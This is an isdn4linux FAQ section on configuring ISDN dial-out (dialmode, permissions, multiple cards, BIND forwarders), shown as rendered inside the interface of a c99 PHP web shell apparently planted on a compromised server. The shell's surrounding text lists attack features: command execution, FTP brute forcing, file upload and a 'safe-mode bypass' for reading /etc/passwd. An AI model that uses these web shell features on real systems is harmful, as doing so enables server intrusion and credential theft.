!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/share/doc/isdn4k-utils-3.2/   drwxr-xr-x
Free 51.99 GB of 127.8 GB (40.68%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     i4lfaq-10.html (11.57 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
FAQ for isdn4linux: dialout: Configuration of Dial-Out Next Previous Contents

10. dialout: Configuration of Dial-Out

10.1 dialout_config: How do I configure dialout properly?

First you have to decide on how you want to dial out. You will have to use whatever your counterpart requires. These are your main options:

  • Sync PPP: This is what most Internet Service Provider expect from you. See section syncppp.
  • Async PPP: May also be handled by your Internet Service Provider. Use when Sync PPP does not work for you. See section asyncppp.
  • Raw IP: Most efficient for TCP/IP over ISDN. It has very quick dialouts, but is not as common. See section rawip.
  • X.75: This is what you need to dial into an ISDN mailbox. See section ttyI.
  • Leased line: For this special case, see section leased.

Have a look on section dod on how to configure dial on demand - and on the dangers attached to it.

For more advanced dialout features see question dialout_advanced.

Also you may have a look at section remote when you try to connect to a special remote ISDN device.

10.2 dialout_dialmode: When an IP packet should go over the link (which usually triggers a dialout), all I see in the log is: "dial rejected: interface not in dialmode auto"?

The new ISDN drivers in 2.0.36 defaults to manual dialmode, not autodial. This is done to prevent unexpected (and unnoticed) dialouts. (See the big section about those and their dangers: dod). To enable autodial for a given interface e.g. ippp0, use


isdnctrl dialmode ippp0 auto

The meaning of the values for dialmode is:

off

means that you (or the system) cannot make any connection (neither incoming nor outgoing connections are possible). Use this if you want to be sure that no connections will be made.

auto

means that the interface is in auto-dial mode, and will attempt to make a connection whenever a network data packet needs the interface's link. Note that this can cause unexpected dialouts, and lead to a high phone bill! Some daemons or other pc's that use this interface can cause this. Incoming connections are also possible.

manual

(DEFAULT) is a dial mode created to prevent the unexpected dialouts. In this mode, the interface will never make any connections on its own. You must explicitly initiate a connection with:


isdnctrl dial ippp0

To end the connection, use:
isdnctrl hangup ippp0

Please note that the huptimeout may still end the connection automatically! To ensure that you have to hang up manually, you have to switch this off:
isdnctrl huptimeout ippp0 0

To allow a normal user to initiate a dialout, have a look at question dialout_permission.

10.3 dialout_advanced: What special dialout features are available?

Check out these special dialout features:

  • Save money by hanging up just before a charge unit: see section chargeint.
  • Dialout on more than 1 channel at the same time: see section 2channel.
  • Dialout on one specific channel: see question dialout_fixedchannel.
  • Callback: see section callback.

10.4 dialout_permission: How can I allow a normal user to initiate dialouts?

ISDN usage depends on the permissions to the devices /dev/ttyI* and /dev/cui*. You have several choices to selectively allow users to do ISDN transactions.

  1. You can establish the group `isdn' in /etc/group, and do:
    chgrp isdn /dev/ttyI* /dev/cui*
    chmod o-rw /dev/ttyI* /dev/cui*
    

    It has been reported that you also may have to change group and permissions on the programs ipppd and isdnctrl to 'isdn'. Then all users not in the group 'isdn' have no reading or writing privileges for the ISDN ttys. Those allowed to use ISDN have to be explicitly added to the group 'isdn'.
  2. You can allow only root to log out, but set up exceptions for other users with the su1 functionality (see man su1). As root edit /etc/su1.priv. Add these lines if they (or similar ones) are not yet there, to allow users XXXX and YYYY to initiate dialups/hangups:
    # log all dialouts in syslog
    syslog all
    define PPPUSER XXXX YYYY
    alias dial /sbin/isdnctrl dial ippp0
    alias hangup /sbin/isdnctrl hangup ippp0
    ask never
    allow PPPUSER prefix dial
    allow PPPUSER prefix hangup
    

    Then create two links for dial and hangup:
    ln -s /usr/bin/su1 /usr/local/bin/dial
    ln -s /usr/bin/su1 /usr/local/bin/hangup
    

    Now the users XXXX and YYYY can dial out by typing dial, and hangup with hangup.
  3. isdnctrl can be set SETUID root. Please not that if it is called by a user different from root, isdnctrl will only allow you to dialin/hangup, and addlink/removelink/show. However, the setup/configuration data can only be modified by root.
  4. If you only have one user that you use for ISDN interactions, you can make him owner of the ISDN interface.

10.5 dialout_manycards: How do I configure dialout with more than 1 ISDN card?

There are several possibilities to configure dialout.

  • Dialout anywhere (default: all available cards are a pool, dialout on one MSN): just configure your cards in the order in which you want them to be dialed out. First all channels on the first card are used, then all on the second card, and so on. Please note that the net interface or ttyI device will try to dial out using the MSN it was configured for - on all cards. Even on those that do not have this MSN! In such a case, the telco will replace that invalid MSN with the correct one. Use isdnctrl mapping to configure the correct MSNs (see item 'dialout on one specific card').
  • Dialout on one specific channel: Use the isdnctrl bind (not pppbind) command to specify which channel should be used. Please use this command after all other configuration with isdnctrl has been done! Check with isdnctrl list that the binding actually works.
  • Dialout with different MSN on each card: You can configure this by using the isdnctrl mappping functionality. Just map MSNs on the letters 0 to 9, like this:
    isdnctrl mapping <carddriver1> 111,222,333,,
    isdnctrl mapping <carddriver2> 999,888,,777
    

    Now, you could configure for telephone number 0 when you really want to use MSN 111 on <carddriver1> or 999 on <carddriver2> (however, since 0 has a special meaning, try to avoid using number 0). Configure to use number 1 when you really want to use MSN 222 on <carddriver1> or 888 on <carddriver2>. Configure to use telephone number 2 when you really want to use only MSN 333 on <carddriver1> (<carddriver2> will use the default MSN when used). Configure to use telephone number 3 when you really want to use only MSN 777 on <carddriver2> (<carddriver1> will use the default MSN when used).
  • Dialout on one specific card: After installing a patch that was posted by Karsten Keil on the mailing list against 2.2.12, you can disallow calls on some cards by using the isdnctrl mapping functionality.
    isdnctrl mapping <carddriver1> 111,222,333,-,
    isdnctrl mapping <carddriver2> 999,888,-,777
    

    It works as discribed for "Dialout with different MSN on each card", except that the "-" means dialing is disallowed. Dialout on telephone number 2 will now only dial out with MSN 333 on <carddriver1>, while dialout on 3 will now only dial out with MSN 777 on <carddriver2>.

10.6 dialout_fixedchannel: How can I force HiSax to always dial out on a specific B channel?

HiSax has an undocumented feature for this. Add 'P1' in front of the dialout phone number for the first B channel, or 'P2' for the second B channel, like this:


isdnctrl addphone <device> out P1<your_out_number>

This will indicate the preferred B channel in the outgoing SETUP message. Please note that some PBX may not like this. Obviously, a dialout will fail when another device already uses the second B channel.

10.7 dialout_dynip: On dynamic ip assignment, how do I find out which ip address is being used for dialout?

Create a script called ip-up. It will be called by the ipppd whenever the connection is established with several parameters. The ip address is passed in as the fourth parameter (access it as $4).

10.8 dialout_bind: A dns query causes bind to dial out. Why does it take about a minute before it is answered? How do I work around it?

You are probably using the name server in 'forward' mode, and your ISP works with dynamic ip addresses. The initial UDP query will be lost since it carries the wrong source address. Unfortunately, bind will wait a whole minute before retransmitting the query again if you have only one forwarder.

As a workaround, you can enter 4 times the same forwarder in named.conf to adjust retransmission timing (in 'forward' mode, bind retransmits its queries after the following period of time: 60 seconds divided by the number of nameservers given in the section "forwarders" of named.conf).


forwarders { 10.0.0.40; 10.0.0.40; 10.0.0.40; 10.0.0.40; }

Bind will then retransmit the query every 15 seconds to your forwarder (here the forwarder is 10.0.0.40). The same principle applies to two or more forwarders.

Another option are the programs ip_resend and ip_resend_wakeup which you can find on: http://www.baty.hanse.de/ip_resend/


Next Previous Contents

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0136 ]--